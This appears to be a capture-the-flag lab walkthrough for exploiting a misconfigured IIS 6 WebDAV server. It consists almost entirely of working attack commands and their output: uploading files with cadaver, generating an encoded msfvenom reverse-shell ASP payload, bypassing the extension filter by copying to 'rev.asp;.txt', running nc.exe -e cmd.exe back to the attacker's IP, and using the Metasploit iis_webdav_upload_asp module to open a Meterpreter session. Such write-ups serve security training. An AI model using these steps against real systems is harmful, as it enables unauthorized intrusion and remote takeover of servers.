3 :80 webdav exploit

Nikto showed

  • Retrieved dasl header: DAV:sql

  • Retrieved dav header: 1, 2

  • Retrieved ms-author-via header: MS-FP/4.0,DAV

  • Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV Using https://book.hacktricks.xyz/pentesting/pentesting-web/put-method-webdav

$ cadaver 10.10.10.15
# echo "WORKS" > test.txt 
dav:/> put test.txt
Uploading test.txt to `/test.txt':
Progress: [=============================>] 100.0% of 6 bytes succeeded.
http://10.10.10.15/test.txt
WORKS

dav:/> put shell.aspx
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 15970 bytes failed:
403 Forbidden

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=443 -e "x86/shikata_ga_nai" -f asp -o rev.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of asp file: 38284 bytes
Saved as: rev.asp

$ mv rev.asp rev.txt

dav:/> put rev.txt
Uploading rev.txt to `/rev.txt':
Progress: [=============================>] 100.0% of 38284 bytes succeeded.
dav:/> copy rev.txt rev.asp;.txt
Copying `/rev.txt' to `/rev.asp%3b.txt':  succeeded.

http://10.10.10.15/rev.asp;.txt
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1031
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv> whoami
nt authority\network service


# shell was very unstable

METHOD 1: nc.exe

$ cp /usr/share/windows-resources/binaries/nc.exe .
$ mv nc.exe nc.txt
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv> C:\Inetpub\wwwroot\nc.exe 10.10.14.12 6969 -e cmd.exe

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1040
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>

METHOD 2: msf windows/iis/iis_webdav_upload_asp

msf6 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Checking /metasploit58023674.asp
[*] Uploading 609574 bytes to /metasploit58023674.txt...
[*] Moving /metasploit58023674.txt to /metasploit58023674.asp...
[*] Executing /metasploit58023674.asp...
[*] Deleting /metasploit58023674.asp (this doesn't always work)...
[*] Sending stage (175174 bytes) to 10.10.10.15
[!] Deletion failed on /metasploit58023674.asp [403 Forbidden]
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.15:1032) at 2021-05-06 10:19:53 -0700

meterpreter > 

Last updated